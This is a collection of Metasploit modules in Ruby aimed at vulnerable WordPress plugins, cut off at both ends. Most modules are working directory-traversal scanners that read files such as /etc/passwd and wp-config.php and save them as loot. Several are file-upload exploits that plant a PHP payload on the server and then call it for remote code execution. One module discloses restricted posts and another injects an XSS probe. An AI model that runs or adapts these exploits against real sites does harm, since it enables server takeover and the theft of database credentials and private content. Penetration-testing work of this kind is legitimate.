21 | }, 22 | 'References' => 23 | [ 24 | ['EDB', '36733'], 25 | ['WPVDB', '7898'] 26 | ], 27 | 'Author' => 28 | [ 29 | 'Khwanchai Kaewyos', # Vulnerability discovery 30 | 'Roberto Soares Espreto ' # Metasploit module 31 | ], 32 | 'License' => MSF_LICENSE 33 | )) 34 | 35 | register_options( 36 | [ 37 | OptString.new('FILEPATH', [true, "The path to the file to read", "/etc/passwd"]), 38 | OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 7 ]) 39 | ], self.class) 40 | end 41 | 42 | def check 43 | check_plugin_version_from_readme('wp-mobile-edition', '2.3') 44 | end 45 | 46 | def run_host(ip) 47 | traversal = "../" * datastore['DEPTH'] 48 | filename = datastore['FILEPATH'] 49 | filename = filename[1, filename.length] if filename =~ /^\// 50 | 51 | res = send_request_cgi({ 52 | 'method' => 'GET', 53 | 'uri' => normalize_uri(wordpress_url_themes, 'mTheme-Unus', 'css', 'css.php'), 54 | 'vars_get' => 55 | { 56 | 'files' => "#{traversal}#(unknown)" 57 | } 58 | }) 59 | 60 | if res && res.code == 200 && res.body.length > 0 61 | 62 | print_status('Downloading file...') 63 | print_line("\n#{res.body}\n") 64 | 65 | fname = datastore['FILEPATH'] 66 | 67 | path = store_loot( 68 | 'mobileedition.traversal', 69 | 'text/plain', 70 | ip, 71 | res.body, 72 | fname 73 | ) 74 | 75 | print_good("#{peer} - File saved in: #{path}") 76 | else 77 | print_error("#{peer} - Nothing was downloaded. 
You can try to change the DEPTH parameter.") 78 | end 79 | end 80 | end 81 | -------------------------------------------------------------------------------- /modules/auxiliary/scanner/http/wp_ecommerce_shop_styling_file_read.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This module requires Metasploit: http://metasploit.com/download 3 | # Current source: https://github.com/rapid7/metasploit-framework 4 | ## 5 | 6 | require 'msf/core' 7 | 8 | class MetasploitModule < Msf::Auxiliary 9 | 10 | include Msf::Auxiliary::Report 11 | include Msf::Exploit::Remote::HTTP::Wordpress 12 | include Msf::Auxiliary::Scanner 13 | 14 | def initialize(info = {}) 15 | super(update_info(info, 16 | 'Name' => 'WordPress eCommerce Shop Styling File Read Vulnerability', 17 | 'Description' => %q{ 18 | This module exploits a directory traversal vulnerability in WordPress Plugin 19 | "eCommerce Shop Styling", allowing to read arbitrary files with the web server 20 | privileges. 21 | }, 22 | 'References' => 23 | [ 24 | ['WPVDB', '8079'], 25 | ['URL', 'http://www.vapid.dhs.org/advisory.php?v=136'] 26 | ], 27 | 'Author' => 28 | [ 29 | 'Larry W. 
Cashdollar', # Vulnerability Discovery 30 | 'Roberto Soares Espreto ' # Metasploit Module 31 | ], 32 | 'License' => MSF_LICENSE 33 | )) 34 | 35 | register_options( 36 | [ 37 | OptString.new('FILEPATH', [true, 'The path to the file to read', '/etc/passwd']), 38 | OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 6 ]) 39 | ], self.class) 40 | end 41 | 42 | def check 43 | check_plugin_version_from_readme('wp-ecommerce-shop-styling', '2.6') 44 | end 45 | 46 | def run_host(ip) 47 | traversal = "../" * datastore['DEPTH'] 48 | filename = datastore['FILEPATH'] 49 | filename = filename[1, filename.length] if filename =~ /^\// 50 | 51 | res = send_request_cgi( 52 | 'method' => 'GET', 53 | 'uri' => normalize_uri(wordpress_url_plugins, 'wp-ecommerce-shop-styling', 'includes', 'download.php'), 54 | 'vars_get' => 55 | { 56 | 'filename' => "#{traversal}#(unknown)" 57 | } 58 | ) 59 | 60 | if res && res.code == 200 && res.body.length > 0 61 | 62 | vprint_status('Downloading file...') 63 | vprint_line("#{res.body}") 64 | 65 | fname = datastore['FILEPATH'] 66 | 67 | path = store_loot( 68 | 'wp-ecommerce-shop-styling', 69 | 'text/plain', 70 | ip, 71 | res.body, 72 | fname 73 | ) 74 | 75 | print_good("#{peer} - File saved in: #{path}") 76 | else 77 | print_error("#{peer} - Nothing was downloaded. 
You can try to change the DEPTH parameter.") 78 | end 79 | end 80 | end 81 | -------------------------------------------------------------------------------- /modules/auxiliary/scanner/http/wp_gimedia_library_file_read.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This module requires Metasploit: http://metasploit.com/download 3 | # Current source: https://github.com/rapid7/metasploit-framework 4 | ## 5 | 6 | require 'msf/core' 7 | 8 | class MetasploitModule < Msf::Auxiliary 9 | 10 | include Msf::Auxiliary::Report 11 | include Msf::Exploit::Remote::HTTP::Wordpress 12 | include Msf::Auxiliary::Scanner 13 | 14 | def initialize(info = {}) 15 | super(update_info(info, 16 | 'Name' => 'WordPress GI-Media Library Plugin File Read Vulnerability', 17 | 'Description' => %q{ 18 | This module exploits a directory traversal vulnerability in WordPress Plugin 19 | "GI-Media Library" version 2.2.2, allowing to read arbitrary files on 20 | WordPress directory. 21 | }, 22 | 'References' => 23 | [ 24 | ['WPVDB', '7754'], 25 | ['URL', 'http://wordpressa.quantika14.com/repository/index.php?id=24'] 26 | ], 27 | 'Author' => 28 | [ 29 | 'Unknown', # Vulnerability discovery - QuantiKa14? 
          'Roberto Soares Espreto ' # Metasploit module
        ],
      'License'        => MSF_LICENSE
    ))

    register_options(
      [
        OptString.new('FILEPATH', [true, 'The WordPress file to read', 'wp-config.php']),
        OptInt.new('DEPTH', [true, 'Traversal Depth (to reach the WordPress root folder)', 3])
      ], self.class)
  end

  def check
    check_plugin_version_from_readme('gi-media-library', '3.0')
  end

  def run_host(ip)
    traversal = '../' * datastore['DEPTH']
    filename = datastore['FILEPATH']
    filename = filename[1, filename.length] if filename =~ /^\//

    # The plugin expects the path base64-encoded in the fileid parameter
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(wordpress_url_plugins, 'gi-media-library', 'download.php'),
      'vars_get' =>
        {
          'fileid' => Rex::Text.encode_base64(traversal + filename)
        }
    )

    if res && res.code == 200 && res.body && res.body.length > 0
      print_status('Downloading file...')
      print_line("\n#{res.body}")

      fname = datastore['FILEPATH']

      path = store_loot(
        'gimedia-library.file',
        'text/plain',
        ip,
        res.body,
        fname
      )

      print_good("#{peer} - File saved in: #{path}")
    else
      print_error("#{peer} - Nothing was downloaded. Check the FILEPATH (relative to the WordPress root) and DEPTH parameters.")
    end
  end
end
--------------------------------------------------------------------------------
/modules/auxiliary/scanner/http/wp_source_control_file_read.rb:
--------------------------------------------------------------------------------
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class MetasploitModule < Msf::Auxiliary

  include Msf::Auxiliary::Report
  include Msf::Exploit::Remote::HTTP::Wordpress
  include Msf::Auxiliary::Scanner

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress Source Control Plugin File Read Vulnerability',
      'Description'    => %q{
        This module exploits a directory traversal vulnerability in the WordPress plugin
        Source Control version 3.0.0, which allows reading arbitrary files from the
        system with the web server's privileges. This module has been tested successfully
        on Source Control version 3.0.0 with WordPress 4.1.3 on Ubuntu 12.04 Server.
      },
      'References'     =>
        [
          ['WPVDB', '7541'],
          ['CVE', '2014-5368'],
          ['URL', 'http://www.openwall.com/lists/oss-security/2014/08/19/3']
        ],
      'Author'         =>
        [
          'Henri Salo', # Vulnerability Discovery
          'Roberto Soares Espreto ' # Metasploit Module
        ],
      'License'        => MSF_LICENSE
    ))

    register_options(
      [
        OptString.new('FILEPATH', [true, 'The file to read', '/etc/passwd']),
        OptInt.new('DEPTH', [true, 'Traversal Depth (to reach the filesystem root folder)', 7])
      ], self.class)
  end

  def check
    check_plugin_version_from_readme('wp-source-control', '3.1.0')
  end

  def run_host(ip)
    traversal = '../' * datastore['DEPTH']
    filename = datastore['FILEPATH']
    filename = filename[1, filename.length] if filename =~ /^\//

    res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(wordpress_url_plugins, 'wp-source-control', 'downloadfiles', 'download.php'),
      'vars_get' =>
        {
          'path' => "#{traversal}#{filename}"
        }
    )

    if res && res.code == 200 && res.body && res.body.length > 0
      fname = datastore['FILEPATH']

      path = store_loot(
        'wp-source-control.file',
        'text/plain',
        ip,
        res.body,
        fname
      )

      print_good("#{peer} - File saved in: #{path}")
    else
      print_error("#{peer} - Nothing was downloaded. Check the FILEPATH and DEPTH parameters.")
    end
  end
end
--------------------------------------------------------------------------------
/modules/auxiliary/scanner/http/wp_really_simple_guest_post_file_read.rb:
--------------------------------------------------------------------------------
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class MetasploitModule < Msf::Auxiliary

  include Msf::Auxiliary::Report
  include Msf::Exploit::Remote::HTTP::Wordpress
  include Msf::Auxiliary::Scanner

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress Really Simple Guest Post File Read Vulnerability',
      'Description'    => %q{
        This module exploits a directory traversal vulnerability in the WordPress
        plugin "Really Simple Guest Post" version 1.0.6, which allows reading
        arbitrary files with the web server's privileges.
      },
      'References'     =>
        [
          ['EDB', '37209'],
          ['WPVDB', '8036']
        ],
      'Author'         =>
        [
          'Kuroi\'SH', # Vulnerability Discovery
          'Roberto Soares Espreto ' # Metasploit Module
        ],
      'License'        => MSF_LICENSE
    ))

    register_options(
      [
        OptString.new('FILEPATH', [true, 'The path to the file to read', '/etc/passwd'])
      ], self.class)
  end

  def check
    check_plugin_version_from_readme('really-simple-guest-post', '1.0.7')
  end

  def run_host(ip)
    filename = datastore['FILEPATH']
    # Only a doubled leading slash is collapsed; the path is otherwise sent as given
    filename = filename[1, filename.length] if filename =~ /^\/\//

    # The vulnerable endpoint takes the path from the multipart 'rootpath' field
    data = Rex::MIME::Message.new
    data.add_part(filename, 'application/octet-stream', nil, 'form-data; name="rootpath"')
    post_data = data.to_s

    res = send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(wordpress_url_plugins, 'really-simple-guest-post', 'simple-guest-post-submit.php'),
      'ctype' => "multipart/form-data; boundary=#{data.bound}",
      'data' => post_data
    )

    # The module expects the file contents in the body of a 500 response
    if res &&
       res.code == 500 &&
       res.body &&
       res.body.length > 0 &&
       res.headers['Content-Length'].to_i > 0

      vprint_status('Downloading file...')
      vprint_line("\n#{res.body}")
      fname = datastore['FILEPATH']

      path = store_loot(
        'reallysimpleguest.traversal',
        'text/plain',
        ip,
        res.body,
        fname
      )

      print_good("#{peer} - File saved in: #{path}")
    else
      print_error("#{peer} - Nothing was downloaded. You can try to change the FILEPATH parameter.")
    end
  end
end
--------------------------------------------------------------------------------
/modules/auxiliary/scanner/http/wp_paypal_currency_converter_basic_for_woocommerce_file_read.rb:
--------------------------------------------------------------------------------
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class MetasploitModule < Msf::Auxiliary

  include Msf::Auxiliary::Report
  include Msf::Exploit::Remote::HTTP::Wordpress
  include Msf::Auxiliary::Scanner

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress PayPal WooCommerce File Read Vulnerability',
      'Description'    => %q{
        This module exploits a directory traversal vulnerability in the WordPress plugin
        "WP PayPal Currency WooCommerce" version 1.3, which allows reading arbitrary files
        with the web server's privileges.
      },
      'References'     =>
        [
          ['EDB', '37253'],
          ['WPVDB', '8042'],
          ['CVE', '2015-5065'],
          ['URL', 'https://packetstormsecurity.com/files/132278']
        ],
      'Author'         =>
        [
          'Kuroi SH', # Vulnerability Discovery
          'Roberto Soares Espreto ' # Metasploit Module
        ],
      'License'        => MSF_LICENSE
    ))

    register_options(
      [
        OptString.new('FILEPATH', [true, 'The path to the file to read', '/etc/passwd']),
        OptInt.new('DEPTH', [true, 'Traversal Depth (to reach the root folder)', 7])
      ], self.class)
  end

  def check
    check_plugin_version_from_readme('paypal-currency-converter-basic-for-woocommerce', '1.4')
  end

  def run_host(ip)
    traversal = '../' * datastore['DEPTH']
    filename = datastore['FILEPATH']
    filename = filename[1, filename.length] if filename =~ /^\//

    res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(wordpress_url_plugins, 'paypal-currency-converter-basic-for-woocommerce', 'proxy.php'),
      'vars_get' =>
        {
          'requrl' => "#{traversal}#{filename}"
        }
    )

    if res && res.code == 200 && res.body && res.body.length > 0
      vprint_status('Downloading file...')
      vprint_line("\n#{res.body}")

      fname = datastore['FILEPATH']

      path = store_loot(
        'paypal-woocommerce.traversal',
        'text/plain',
        ip,
        res.body,
        fname
      )

      print_good("#{peer} - File saved in: #{path}")
    else
      print_error("#{peer} - Nothing was downloaded. You can try to change the DEPTH parameter.")
    end
  end
end
--------------------------------------------------------------------------------
/modules/exploits/unix/webapp/wp_woopra_analytics_file_upload.rb:
--------------------------------------------------------------------------------
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HTTP::Wordpress
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(
      info,
      'Name'           => 'WordPress Woopra Analytics File Upload',
      'Description'    => %q{
        The WordPress Woopra Analytics plugin contains an arbitrary file upload
        vulnerability. Because the plugin uses its own upload handler
        (ofc_upload_image.php) instead of the WordPress API, the file type is not
        restricted and arbitrary files can be written to the upload folder.
      },
      'Author'         =>
        [
          'wantexz', # Vulnerability Discovery
          'Roberto Soares Espreto ' # Metasploit Module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['WPVDB', '6903'],
          ['URL', 'http://packetstormsecurity.com/files/123525/']
        ],
      'Privileged'     => false,
      'Platform'       => ['php'],
      'Arch'           => ARCH_PHP,
      'Targets'        => [['WP Woopra Analytics 1.4.3.1', {}]],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Sep 06 2013'
    ))
  end

  def check
    check_plugin_version_from_readme('woopra', '1.4.3.2')
  end

  def exploit
    filename = "#{rand_text_alpha_lower(6)}.php"

    # ofc_upload_image.php writes the raw POST body to tmp-upload-images/<name>
    print_status("#{peer} - Uploading payload as #{filename}")
    res = send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(wordpress_url_plugins, 'woopra', 'inc', 'php-ofc-library', 'ofc_upload_image.php'),
      'ctype' => 'text/plain',
      'vars_get' => {
        'name' => filename
      },
      'data' => payload.encoded
    )

    if res
      if res.code == 200
        register_files_for_cleanup(filename)
      else
        fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response, exploit probably failed!")
      end
    else
      fail_with(Failure::Unknown, 'Server did not respond in an expected way')
    end

    print_status("#{peer} - Calling uploaded file #{filename}")
    send_request_cgi(
      { 'uri' => normalize_uri(wordpress_url_plugins, 'woopra', 'inc', 'tmp-upload-images', filename) },
      5
    )
  end
end
--------------------------------------------------------------------------------
/modules/exploits/unix/webapp/wp_creativecontactform_file_upload.rb:
--------------------------------------------------------------------------------
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HTTP::Wordpress
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress Creative Contact Form Upload Vulnerability',
      'Description'    => %q{
        This module exploits an arbitrary PHP code upload in the WordPress Creative Contact
        Form plugin, version 0.9.7. The vulnerability allows for arbitrary file upload and
        remote code execution.
      },
      'Author'         =>
        [
          'Gianni Angelozzi', # Vulnerability discovery
          'Roberto Soares Espreto ' # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['EDB', '35057'],
          ['OSVDB', '113669'],
          ['WPVDB', '7652']
        ],
      'Privileged'     => false,
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        => [['Creative Contact Form 0.9.7', {}]],
      'DisclosureDate' => 'Oct 22 2014',
      'DefaultTarget'  => 0)
    )
  end

  def check
    check_plugin_version_from_readme('sexy-contact-form', '1.0.0')
  end

  def exploit
    php_pagename = rand_text_alpha(8 + rand(8)) + '.php'

    # The plugin's upload handler does not restrict the filename given in files[]
    data = Rex::MIME::Message.new
    data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"files[]\"; filename=\"#{php_pagename}\"")
    post_data = data.to_s

    res = send_request_cgi({
      'uri' => normalize_uri(wordpress_url_plugins, 'sexy-contact-form', 'includes', 'fileupload', 'index.php'),
      'method' => 'POST',
      'ctype' => "multipart/form-data; boundary=#{data.bound}",
      'data' => post_data
    })

    if res
      if res.code == 200 && res.body =~ /files|#{php_pagename}/
        print_good("#{peer} - Our payload is at: #{php_pagename}")
        register_files_for_cleanup(php_pagename)
      else
        fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}")
      end
    else
      fail_with(Failure::Unknown, 'Server did not respond in an expected way')
    end

    print_status("#{peer} - Calling payload...")
    send_request_cgi(
      'uri' => normalize_uri(wordpress_url_plugins, 'sexy-contact-form', 'includes', 'fileupload', 'files', php_pagename)
    )
  end
end
--------------------------------------------------------------------------------
/modules/exploits/unix/webapp/wp_inboundio_marketing_file_upload.rb:
--------------------------------------------------------------------------------
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HTTP::Wordpress
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress InBoundio Marketing Upload Vulnerability',
      'Description'    => %q{
        This module exploits an arbitrary PHP code upload in the WordPress InBoundio Marketing
        plugin, version 2.0. The vulnerability allows for arbitrary file upload and remote code
        execution.
      },
      'Author'         =>
        [
          'KedAns-Dz', # Vulnerability discovery
          'Roberto Soares Espreto ' # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['EDB', '36478'],
          ['OSVDB', '119890'],
          ['WPVDB', '7864']
        ],
      'Privileged'     => false,
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        => [['InBoundio Marketing 2.0', {}]],
      'DisclosureDate' => 'Mar 24 2015',
      'DefaultTarget'  => 0)
    )
  end

  def check
    check_plugin_version_from_readme('inboundio-marketing', '2.0.3')
  end

  def exploit
    php_pagename = rand_text_alpha(8 + rand(8)) + '.php'

    # csv_uploader.php stores the 'file' part under uploaded_csv/ with the supplied name
    data = Rex::MIME::Message.new
    data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"file\"; filename=\"#{php_pagename}\"")
    post_data = data.to_s

    res = send_request_cgi(
      'uri' => normalize_uri(wordpress_url_plugins, 'inboundio-marketing', 'admin', 'partials', 'csv_uploader.php'),
      'method' => 'POST',
      'ctype' => "multipart/form-data; boundary=#{data.bound}",
      'data' => post_data
    )

    if res
      if res.code == 200 && res.body =~ /#{php_pagename}/
        print_good("#{peer} - Our payload is at: #{php_pagename}.")
        register_files_for_cleanup(php_pagename)
      else
        fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}")
      end
    else
      fail_with(Failure::Unknown, 'Server did not respond in an expected way')
    end

    print_status("#{peer} - Calling payload...")
    send_request_cgi(
      'uri' => normalize_uri(wordpress_url_plugins, 'inboundio-marketing', 'admin', 'partials', 'uploaded_csv', php_pagename)
    )
  end
end
--------------------------------------------------------------------------------
/modules/auxiliary/scanner/http/wp_se_html5_album_audioplayer_file_read.rb:
--------------------------------------------------------------------------------
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class MetasploitModule < Msf::Auxiliary

  include Msf::Auxiliary::Report
  include Msf::Exploit::Remote::HTTP::Wordpress
  include Msf::Auxiliary::Scanner

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress SE HTML5 Album Audio Player File Read Vulnerability',
      'Description'    => %q{
        This module exploits a directory traversal vulnerability in the WordPress plugin
        "SE HTML5 Album Audio Player", which allows reading arbitrary files with the web
        server's privileges.
      },
      'References'     =>
        [
          ['WPVDB', '8032'],
          ['CVE', '2015-4414'],
          ['URL', 'http://www.vapid.dhs.org/advisory.php?v=124']
        ],
      'Author'         =>
        [
          'Larry Cashdollar', # Vulnerability Discovery
          'Roberto Soares Espreto ' # Metasploit Module
        ],
      'License'        => MSF_LICENSE
    ))

    register_options(
      [
        OptString.new('FILEPATH', [true, 'The path to the file to read', '/etc/passwd']),
        OptInt.new('DEPTH', [true, 'Traversal Depth (to reach the root folder)', 6])
      ], self.class)
  end

  def check
    # No fixed version is given, so this only reports whether the plugin is present
    check_plugin_version_from_readme('se-html5-album-audio-player')
  end

  def run_host(ip)
    traversal = '../' * datastore['DEPTH']
    filename = datastore['FILEPATH']
    filename = filename[1, filename.length] if filename =~ /^\//

    # The module supplies the /wp-content/uploads/ prefix and then climbs out of it
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(wordpress_url_plugins, 'se-html5-album-audio-player', 'download_audio.php'),
      'vars_get' =>
        {
          'file' => "/wp-content/uploads/#{traversal}#{filename}"
        }
    )

    unless res && res.body
      vprint_error("#{peer} - Failed! Unexpected response from server.")
      return
    end

    if res.code == 200 && res.body.length > 0
      vprint_status('Downloading file...')
      vprint_line("#{res.body}")

      fname = datastore['FILEPATH']

      path = store_loot(
        'se-html5-album',
        'text/plain',
        ip,
        res.body,
        fname
      )

      print_good("#{peer} - File saved in: #{path}")
    else
      print_error("#{peer} - Nothing was downloaded. You can try to change the DEPTH parameter.")
    end
  end
end
--------------------------------------------------------------------------------
/modules/exploits/unix/webapp/wp_wpshop_ecommerce_file_upload.rb:
--------------------------------------------------------------------------------
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HTTP::Wordpress
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress WPshop eCommerce Upload Vulnerability',
      'Description'    => %q{
        This module exploits an arbitrary PHP code upload in the WordPress WPshop eCommerce plugin,
        version 1.3.9.5. The vulnerability allows for arbitrary file upload and remote code execution.
      },
      'Author'         =>
        [
          'g0blin', # Vulnerability Discovery
          'Roberto Soares Espreto ' # Metasploit Module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['WPVDB', '7830'],
          ['URL', 'https://research.g0blin.co.uk/g0blin-00036/']
        ],
      'Privileged'     => false,
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        => [['WPshop eCommerce 1.3.9.5', {}]],
      'DisclosureDate' => 'Mar 09 2015',
      'DefaultTarget'  => 0)
    )
  end

  def check
    check_plugin_version_from_readme('wpshop', '1.3.9.6')
  end

  def exploit
    php_pagename = rand_text_alpha(5 + rand(5)) + '.php'

    # The ajaxUpload action in includes/ajax.php writes wpshop_file to wp-content/uploads under the supplied name
    data = Rex::MIME::Message.new
    data.add_part('ajaxUpload', nil, nil, 'form-data; name="elementCode"')
    data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"wpshop_file\"; filename=\"#{php_pagename}\"")
    post_data = data.to_s

    res = send_request_cgi(
      'uri' => normalize_uri(wordpress_url_plugins, 'wpshop', 'includes', 'ajax.php'),
      'method' => 'POST',
      'ctype' => "multipart/form-data; boundary=#{data.bound}",
      'data' => post_data
    )

    if res
      if res.code == 200 && res.body =~ /#{php_pagename}/
        print_good("#{peer} - Our payload is at: #{php_pagename}.")
        register_files_for_cleanup(php_pagename)
      else
        fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}")
      end
    else
      fail_with(Failure::Unknown, 'Server did not respond in an expected way')
    end

    print_status("#{peer} - Calling payload...")
    send_request_cgi(
      'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', php_pagename)
    )
  end
end
--------------------------------------------------------------------------------
/modules/auxiliary/scanner/http/wp_mobile_pack_info_disclosure.rb:
--------------------------------------------------------------------------------
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class MetasploitModule < Msf::Auxiliary

  include Msf::Auxiliary::Report
  include Msf::Exploit::Remote::HTTP::Wordpress
  include Msf::Auxiliary::Scanner

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress Mobile Pack Information Disclosure Vulnerability',
      'Description'    => %q{
        This module exploits an information disclosure vulnerability in the WordPress plugin
        "WP Mobile Pack" version 2.1.2, which allows reading post content by post ID through
        the plugin's export endpoint, including content that requires privileges to view.
      },
      'References'     =>
        [
          ['WPVDB', '8107'],
          ['URL', 'https://packetstormsecurity.com/files/132750/']
        ],
      'Author'         =>
        [
          'Nitin Venkatesh', # Vulnerability Discovery
          'Roberto Soares Espreto ' # Metasploit Module
        ],
      'License'        => MSF_LICENSE
    ))

    register_options(
      [
        OptString.new('POSTID', [true, 'The ID of the post to read', '1'])
      ], self.class)
  end

  def check
    check_plugin_version_from_readme('wordpress-mobile-pack', '2.1.3')
  end

  def run_host(ip)
    postid = datastore['POSTID']

    begin
      res = send_request_cgi(
        'method' => 'GET',
        'uri' => normalize_uri(wordpress_url_plugins, 'wordpress-mobile-pack', 'export', 'content.php'),
        'vars_get' => {
          'content' => 'exportarticle',
          'callback' => 'exportarticle',
          'articleId' => "#{postid}"
        }
      )
    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable => e
      print_error("#{peer} - The following Error was encountered: #{e.class}")
      return
    end

    unless res && res.body
      print_error("#{peer} - Server did not respond in an expected way")
      return
    end

    # The endpoint answers as JSONP, exportarticle({...}); strip only that wrapper
    # rather than every ')' in the body, so parentheses inside the post survive
    begin
      json = res.body.sub(/\Aexportarticle\(/, '').sub(/\)\s*;?\s*\z/, '')
      temp = JSON.parse(json)
    rescue JSON::ParserError => e
      print_error("#{peer} - The following Error was encountered: #{e.class}")
      return
    end

    if res.code == 200 &&
       res.body.length > 29 &&
       res.headers['Content-Type'].to_s.include?('application/json') &&
       !res.body.include?('"error":')

      vprint_status('Enumerating...')
      res_clean = JSON.pretty_generate(temp)
      vprint_good("Found:\n\n#{res_clean}\n")

      path = store_loot(
        'mobilepack.disclosure',
        'text/plain',
        ip,
        res_clean
      )
      print_good("#{peer} - File saved in: #{path}")
    else
      print_error("#{peer} - Nothing was downloaded. You can try checking the POSTID parameter.")
    end
  end
end
--------------------------------------------------------------------------------
/modules/auxiliary/scanner/http/wp_ninja_forms_xss_scanner.rb:
--------------------------------------------------------------------------------
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class MetasploitModule < Msf::Auxiliary

  include Msf::Exploit::Remote::HTTP::Wordpress
  include Msf::Auxiliary::Scanner
  include Msf::Auxiliary::Report

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress Ninja Forms XSS Scanner',
      'Description'    => %q{
        This module attempts to exploit an authenticated cross-site scripting vulnerability
        in the Ninja Forms plugin for WordPress, version 2.9.21 and likely prior, in order to
        determine whether the instance is vulnerable.
      },
      'Author'         =>
        [
          'Morten Nørtoft, Kenneth Jepsen, Mikkel Vej', # Vulnerability Discovery
          'Roberto Soares Espreto ' # Metasploit Module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['WPVDB', '8128'],
          ['URL', 'https://packetstormsecurity.com/files/132913/']
        ],
      'DisclosureDate' => 'Jul 14 2015'
    ))

    register_options(
      [
        OptString.new('WP_USER', [true, 'A valid username', nil]),
        OptString.new('WP_PASS', [true, 'A valid password', nil])
      ], self.class)
  end

  def check
    check_plugin_version_from_readme('ninja-forms', '2.9.22')
  end

  def user
    datastore['WP_USER']
  end

  def password
    datastore['WP_PASS']
  end

  def run_host(ip)
    vprint_status("#{peer} - Trying to login as: #{user}")
    cookie = wordpress_login(user, password)
    if cookie.nil?
      print_error("#{peer} - Unable to login as: #{user}")
      return
    end

    # Generic reflected-XSS probe carrying a random marker (the specific payload
    # string is not preserved in this copy of the module)
    marker = Rex::Text.rand_text_numeric(8)
    xss = "<script>alert(#{marker})</script>"

    res = send_request_cgi(
      'uri' => normalize_uri(wordpress_url_backend, 'admin.php'),
      'vars_get' => {
        'page' => 'nf-processing',
        'title' => xss
      },
      'cookie' => cookie
    )

    unless res && res.body
      print_error("#{peer} - Server did not respond in an expected way")
      return
    end

    # Vulnerable only if the probe is reflected unescaped
    if res.code == 200 && res.body.include?(xss)
      print_good("#{peer} - Vulnerable to Cross-Site Scripting: Ninja Forms 2.9.21 plugin for WordPress")
      p = store_local(
        'ninjaforms.http',
        'text/html',
        res.body,
        "ninjaforms_xss_#{marker}.html"
      )
      print_good("Saved in: #{p}")
    else
      print_error("#{peer} - Failed, maybe the target isn't vulnerable.")
    end
  end
end
--------------------------------------------------------------------------------
/modules/auxiliary/scanner/http/wp_database_sync_xss_scanner.rb:
--------------------------------------------------------------------------------
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class MetasploitModule < Msf::Auxiliary

  include Msf::Exploit::Remote::HTTP::Wordpress
  include Msf::Auxiliary::Scanner
  include Msf::Auxiliary::Report

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress Database Sync XSS Scanner',
      'Description'    => %q{
        This module attempts to exploit an authenticated cross-site scripting vulnerability
        in the Database Sync plugin for WordPress, version 0.4 and likely prior, in order to
        determine whether the instance is vulnerable.
      },
      'Author'         =>
        [
          'Morten Nørtoft, Kenneth Jepsen & Mikkel Vej', # Vulnerability Discovery
